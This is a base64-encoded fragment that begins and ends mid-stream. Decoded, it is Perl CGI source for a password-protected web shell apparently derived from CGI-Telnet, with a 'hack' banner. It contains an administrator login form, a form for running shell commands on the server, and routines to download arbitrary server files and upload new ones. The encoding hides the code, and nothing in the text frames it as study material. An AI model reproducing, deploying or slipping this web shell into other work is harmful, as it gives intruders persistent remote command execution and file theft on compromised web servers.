VtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7DQogIH0gZWxzZSB7DQoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOw0KCXRoaXMuY3VycmVudENoYXIgPSAwOw0KICAgICAgICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsNCiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7DQogIH0NCn0NCjwvc2NyaXB0Pg0KPC9wcmU+DQoNCjxicj4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KbmV3IFR5cGluZ1RleHQoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImhhY2siKSwgMzAsIGZ1bmN0aW9uKGkpeyB2YXIgYXIgPSBuZXcgQXJyYXkoIl8iLCIiKTsgcmV0dXJuICIgIiArIGFyW2kubGVuZ3RoICUgYXIubGVuZ3RoXTsgfSk7DQpUeXBpbmdUZXh0LnJ1bkFsbCgpOw0KDQo8L3NjcmlwdD4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBlbmNvZGUgaHRtbCBzcGVjaWFsIGNoYXJzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXJsRW5jb2RlKCQpew0KCW15ICRzdHIgPSBzaGlmdDsNCgkkc3RyID1+IHMvKFteQS1aYS16MC05XSkvc3ByaW50ZigiJSUlMDJYIiwgb3JkKCQxKSkvc2VnOw0KCXJldHVybiAkc3RyOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBBZGQgaHRtbCBzcGVjaWFsIGNoYXJzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsNCglteSAkdGV4dCA9IHNoaWZ0Ow0KCSR0ZXh0ID1+IHMvJi8mYW1wOy9nOw0KCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsNCgkkdGV4dCA9fiBzLycvJy9nOw0KCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7DQoJJHRleHQgPX4gcy8+LyZndDsvZzsNCglyZXR1cm4gJHRleHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEFkZCBsaW5rIGZvciBkaXJlY3RvcnkNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBBZGRMaW5rRGlyKCQpDQp7DQoJbXkgJGFjPXNoaWZ0Ow0KCW15IEBkaXI9KCk7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJQGRpcj1zcGxpdCgvXFwvLCRDdXJyZW50RGlyKTsNCgl9ZWxzZQ0KCXsNCgkJQGRpcj1zcGxpdCgiLyIsJnRyaW0oJEN1cnJlbnREaXIpKTsNCgl9DQoJbXkgJHBhdGg9IiI7DQoJbXkgJHJlc3VsdD0iIjsNCglmb3JlYWNoIChAZGlyKQ0KCXsNCgkJJHBhdGggLj0gJF8uJFBhdGhTZXA7DQoJCSRyZXN1bHQuPSI8YSBocmVmPSc/YT0iLiRhYy4iJmQ9Ii5lbmNvZGVfYmFzZTY0KCRwYXRoKS4iJz4iLiRfLiRQYXRoU2VwLiI8L2E+IjsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KDQpQYXNzd29yZDo8YnI+DQpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRm9ybQ0Kew0KCXByaW50IDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0ibG9naW4iPg0KTG9naW4gOiBBZG1pbmlzdHJhdG9yPGJyPg0KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQpFTkQNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludFBhZ2VGb290ZXINCnsNCglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZXRyZWl2ZXMgdGhlIHZhbHVlcyBvZiBhbGwgY29va2llcy4gVGhlIGNvb2tpZXMgY2FuIGJlIGFjY2Vzc2VzIHVzaW5nIHRoZQ0KIyB2YXJpYWJsZSAkQ29va2llc3snJ30NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBHZXRDb29raWVzDQp7DQoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsNCglmb3JlYWNoICRjb29raWUoQGh0dHBjb29raWVzKQ0KCXsNCgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOw0KCQkkQ29va2llc3skaWR9ID0gJHZhbDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9nb3V0DQp7DQoJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPTtcbiI7ICMgcmVtb3ZlIHBhc3N3b3JkIGNvb2tpZQ0KCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkmUHJpbnRMb2dvdXRTY3JlZW47DQoNCgkmUHJpbnRMb2dpblNjcmVlbjsNCgkmUHJpbnRMb2dpbkZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCglleGl0Ow0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQNCiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QNCiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyDQojIHRvIGxvZ2luDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ2luIA0Kew0KCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkDQoJew0KCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyOw0KCQlwcmludCAmTGlzdERpcjsNCgl9DQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCQkmUHJpbnRMb2dpblNjcmVlbjsNCgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZA0KCQl7DQoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7DQoNCgkJfQ0KCQkmUHJpbnRMb2dpbkZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCWV4aXQ7DQoJfQ0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkRW5jb2RlQ3VycmVudERpciA9IEVuY29kZURpcigkQ3VycmVudERpcik7DQoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIjxmb250IGNvbG9yPScjRkZGRkZGJz5bYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQ8L2ZvbnQ+ICI7DQoJcmV0dXJuIDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiIgb25TdWJtaXQ9IkVuY29kZXIoJ2MnKSI+DQoNCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJjb21tYW5kIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRFbmNvZGVDdXJyZW50RGlyIj4NCiRQcm9tcHQNCjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI0MCIgbmFtZT0iYyIgaWQ9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQ0Kew0KCSRFbmNvZGVDdXJyZW50RGlyID0gRW5jb2RlRGlyKCRDdXJyZW50RGlyKTsNCglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IA0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkICI7DQoJcmV0dXJuIDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEVuY29kZUN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KDQo8L2Zvcm0+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byB1cGxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCW15ICRkaXI9ICZBZGRMaW5rRGlyKCJ1cGxvYWQiKTsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJCAiOw0KCXJldHVybiA8PEVORDsNCjxmb3JtIG5hbWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4NCjxsYWJlbCBmb3I9InVwIj5PdmVyd3JpdGUgaWYgaXQgRXhpc3RzPC9sYWJlbD48YnI+PGJyPg0KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEVuY29kZUN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+DQo8L2Zvcm0+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcmV0dXJuIDw8RU5EOw0KPC90ZXh0YXJlYT4NCjxicj48Zm9udCBjb2xvcj15ZWxsb3c+DQpDb21tYW5kIGV4Y2VlZGVkIG1heGltdW0gdGltZSBvZiAkQ29tbWFuZFRpbWVvdXREdXJhdGlvbiBzZWNvbmQocykuPC9mb250Pg0KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250Pg0KRU5EDQoJfQ0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMgZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsNCglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglteSAkcmVzdWx0PSIiOw0KCWlmKC1lICRGaWxlVXJsKSAjIGlmIHRoZSBmaWxlIGV4aXN0cw0KCXsNCgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3Nlcg0KCQkkRmlsZVVybCA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsNCgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkcmVzdWx0IC49IDw8RU5EOw0KU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+DQoNCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LA0KPGEgaHJlZj0iJERvd25sb2FkTGluayI+Q2xpY2sgSGVyZTwvYT4NCkVORA0KCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCX0NCgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJHJlc3VsdCAuPSAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbXkgJHJlc3VsdCA9ICIiOw0KCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsNCglpZihvcGVuKFNFTkRGSUxFLCAkU2VuZEZpbGUpKSAjIGZpbGUgb3BlbmVkIGZvciByZWFkaW5nDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWJpbm1vZGUoU0VOREZJTEUpOw0KCQkJYmlubW9kZShTVERPVVQpOw0KCQl9DQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOw0KCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7DQoJCXByaW50ICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtdW5rbm93blxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7DQoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOw0KCQlwcmludCB3aGlsZSg8U0VOREZJTEU+KTsNCgkJY2xvc2UoU0VOREZJTEUpOw0KCQlleGl0KDEpOw0KCX0NCgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQ0KCXsNCgkJJHJlc3VsdCAuPSAiRmFpbGVkIHRvIGRvd25sb2FkICRTZW5kRmlsZTogJCEiOw0KCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlDQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMgVGhpcyBmdW5jdGlvbiBpcyBhbHNvIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGNsaWNrcyBvbiB0aGF0IGxpbmsuIEluIHRoaXMgY2FzZSwNCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCZWdpbkRvd25sb2FkDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyR